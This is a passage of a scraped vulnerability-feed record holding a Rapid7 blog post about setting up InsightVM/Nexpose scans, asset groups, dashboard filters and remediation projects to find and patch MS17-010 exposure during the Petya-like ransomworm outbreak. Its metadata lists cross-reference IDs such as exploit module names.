style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">WannaCry</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> as well, so we cannot stress enough the importance of patching against MS17-010 vulnerabilities</span><span style=\"font-size: 11pt; font-family: Arial; color: #ff0000;\">. 
</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For the latest updates on this ransomworm, please see Rapid7&#8217;s </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fpetya%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">recommended actions</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">To help customers understand their risk, we are sharing steps to create a targeted scan, dynamic asset group, and remediation project for identifying and fixing vulnerabilities; we will update as more information becomes available on other CVEs that may be used to spread the worm. 
As always, you can contact Rapid7 Support and your CSM with any questions, and if you haven&#8217;t done so already, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">download a trial of InsightVM here</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Scan Template</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">The step-by-step guide to create an InsightVM/Nexpose scan template specifically to look for MS17-010 </span><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">is as follows:</span></p><p style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #212121;\">1.&#160; Under the Administration tab, go to Templates &gt; Manage Templates</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67229/Admin-ManageTemplates.gif\"><img alt=\"Admin-ManageTemplates.gif\" class=\"image-1 jive-image\" height=\"687\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67229/Admin-ManageTemplates.gif\" style=\"width: 620px; height: 298px;\" width=\"1430\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">2. Copy the following template: Full Audit without Web Spider. 
Don't forget to give your copy a name and description.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67230/Admin-CopyScantemplate.gif\"><img alt=\"Admin-CopyScantemplate.gif\" class=\"image-2 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67230/Admin-CopyScantemplate.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">3. First uncheck \"Policies\". Click on Vulnerability Checks and then \"By Individual Checks\"</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67231/Admin-ByIndividualCheck.gif\"><img alt=\"Admin-ByIndividualCheck.gif\" class=\"image-3 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67231/Admin-ByIndividualCheck.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-family: Arial; font-size: 11pt;\">4. 
<span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Add Check &ldquo;</span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">MS17-010</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">&#8221; and click Save:</span></span></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p style=\"padding-left: 30px;\"><span style=\"color: #000000; font-size: 11pt; font-family: Arial;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67232/Scantemplate-ms17-010.gif\"><img alt=\"Scantemplate-ms17-010.gif\" class=\"image-4 jive-image\" height=\"747\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67232/Scantemplate-ms17-010.gif\" style=\"width: 620px; height: 325px;\" width=\"1425\"/></a></span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><p dir=\"ltr\" style=\"padding-left: 30px;\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should return checks that are related to MS17-010. 
The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0143</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0144</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0145</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0146</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">CVE-2017-0147</span></a></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" 
rel=\"nofollow\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"padding-left: 30px;\">5. <span style=\"color: #000000; font-size: 11pt; font-family: Arial;\">Save the template and run a scan to identify all assets with MS17-010.</span></p><p style=\"min-height: 8pt; padding: 0px; padding-left: 30px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dynamic Asset Group</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Now that you have scanned your assets, you may want to create a Dynamic Asset Group for reporting and tagging, which will update whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the </span><a class=\"jive-link-external-small\" href=\"/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" rel=\"nofollow\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\">InsightVM</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> console, just under the search button:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\"><img alt=\"Screen Shot 2017-06-27 at 3.55.40 PM.png\" class=\"image-5 jive-image\" height=\"160\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67235/Screen+Shot+2017-06-27+at+3.55.40+PM.png\" style=\"width: auto; height: auto;\" width=\"620\"/></a></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> <a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\"><img 
alt=\"Screen Shot 2017-06-27 at 3.42.28 PM.png\" class=\"image-6 jive-image\" height=\"457\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7924-67236/Screen+Shot+2017-06-27+at+3.42.28+PM.png\" style=\"width: 620px; height: 385px;\" width=\"736\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Dashboard</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Rapid7 will add a pre-built dashboard for the Petya-like ransomworm, like we did with the recent WannaCry and Samba vulnerabilities. </span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">Also, check out the new </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7908\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/06/13/live-threat-driven-prioritization\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">Threat Feed dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\"> which contains a view of your assets that are affected by actively targeted vulnerabilities including those leveraged by this ransomworm.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">If you want to build your own, </span><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">here&#8217;s </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" 
href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">how you can build a custom dashboard</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #303030;\">, with examples taken from the Shadow Brokers leak.&#160; To find your exposure to MS17-010 vulnerabilities, you could use this Dashboard filter:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: 'courier new', courier;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0101\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a SQL Query Export</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">@00jay kindly posted this handy discussion for details on using the SQL export in InsightVM/Nexpose: </span><span style=\"font-size: 11pt; font-family: Arial; color: #3f98d4;\"><a class=\"jive-link-thread-small\" data-containerId=\"2004\" data-containerType=\"14\" data-objectId=\"9963\" data-objectType=\"1\" href=\"https://community.rapid7.com/thread/9963\">WannaCry - Scanning &amp; Reporting.</a></span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><h2 dir=\"ltr\"><span style=\"color: #eb7a3d;\">Creating a Remediation Project</span></h2><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #231f20;\">In InsightVM, you can also create a remediation project to track the progress of remediation. 
To do this, go to the &ldquo;Projects&#8221; tab and click &ldquo;Create a Project&#8221;:</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #231f20;\"><a href=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\"><img class=\"jive-image\" height=\"144\" src=\"https://lh5.googleusercontent.com/vT0bpOOFI8vB3q3V9gw8-6F5W9nDDjQSwCiYeai89avr0DFI0a7gbl0RLnuxHfrOJ7dA6U4zd1bV4zaEdA3WHeVD-F5C8E_Ok75WKrdvhHWqG3v-yzBxQVCIk6ZrcUCRgZ_jOHC9\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Give the project a name, and under vulnerability filter type in <span style=\"font-family: 'courier new', courier;\">vulnerability.alternateIds.altId CONTAINS \"MS17-010\"</span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\"><img class=\"jive-image\" height=\"248\" src=\"https://lh5.googleusercontent.com/EKYc9oj7OfPlbI3V-CxqCdTrnBcrr3fyVQHq_vbi2ba2nN5g-lMp_vSoZGp9tDByRKlVgVuRKXn2-h1ZaJUiiRZHm2y4-JlBItYYUiKqIUuv8FwSuZy1tlF89xpX8lChUuJQPGKd\" style=\"border-style: none;\" width=\"624\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Note that this project is going to be dynamic, so it will automatically update as you fix and/or find new instances of this vulnerability.</span></p><p style=\"min-height: 8pt; padding: 
0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Now, you can give this project a description, and configure who is responsible for remediation, as well as access levels if you wish. If you have </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7839\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/08/simple-remediation-collaboration\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">JIRA or ServiceNow</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, you can also configure the automatic ticketing integration between InsightVM and JIRA/ServiceNow to automatically assign tickets to the right folks.</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Using these steps, you&#8217;ll be able to quickly scan for the vulnerabilities leveraged by this ransomworm. 
If you have any questions please don&#8217;t hesitate to let us know!</span></p><p style=\"min-height: 8pt; padding: 0px;\">&#160;</p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">For more information and resources on this ransomworm, </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fdoublepulsar\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">please visit this page</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">.</span></p></div><!-- [DocumentBodyEnd:736fb2f2-6580-4bdc-908e-ca4c7c801548] -->", "title": "Petya-like ransomworm: Leveraging InsightVM and Nexpose for visibility into MS17-010", "cvelist": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 130, "enchantments": {"score": {"value": 7.9, "vector": "NONE", "modified": "2017-06-28T03:17:01", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", 
"MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96625", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", 
"THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-06-28T03:17:01", "rev": 2}}, "reporter": "Ken Mizota", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "rapid7community", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"published": "2017-05-16T17:51:28", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.6, "vector": "NONE", "modified": "2017-05-16T18:48:52", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810814", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-017.NASL", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10984"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0101", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0102", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96625", "SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96627", "SMNTC-96709"]}, {"type": 
"checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0102", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}], "modified": "2017-05-16T18:48:52", "rev": 2}}, "id": "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "objectVersion": "1.5", "title": "Scanning and Remediating WannaCry/MS17-010 in InsightVM and Nexpose", "bulletinFamily": "blog", "viewCount": 210, "reporter": "Nathan Palanov", "references": [], "enchantments_done": [], "type": "rapid7community", "_object_type": "robots.models.rss.RssBulletin", "history": [{"lastseen": 
